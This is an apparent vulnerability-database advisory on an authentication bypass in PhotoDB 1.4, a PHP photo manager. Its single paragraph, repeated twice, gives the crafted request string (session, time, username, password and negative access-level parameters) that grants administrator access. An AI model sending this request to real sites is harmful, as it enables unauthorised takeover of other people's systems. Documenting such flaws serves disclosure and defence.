VULHUB ™

PhotoDB 1.4 is a PHP based photo management and display system. It makes use of a simple authentication script that can easily be bypassed to gain administrator access. This is done by submitting a request with the following parameters to the administrator's page: /[THEADMINSPAGE]?PHPSESSID=abc123&Time=9999999999999&rmtusername=hop&rmtpassword=hop&accessevel=-5 The values for the parameters given above circumvent the simple checks the script employs, as described in the analysis by "frog frog".

PhotoDB 1.4 is a PHP based photo management and display system. It makes use of a simple authentication script that can easily be bypassed to gain administrator access. This is done by submitting a request with the following parameters to the administrator's page: /[THEADMINSPAGE]?PHPSESSID=abc123&Time=9999999999999&rmtusername=hop&rmtpassword=hop&accessevel=-5 The values for the parameters given above circumvent the simple checks the script employs, as described in the analysis by "frog frog".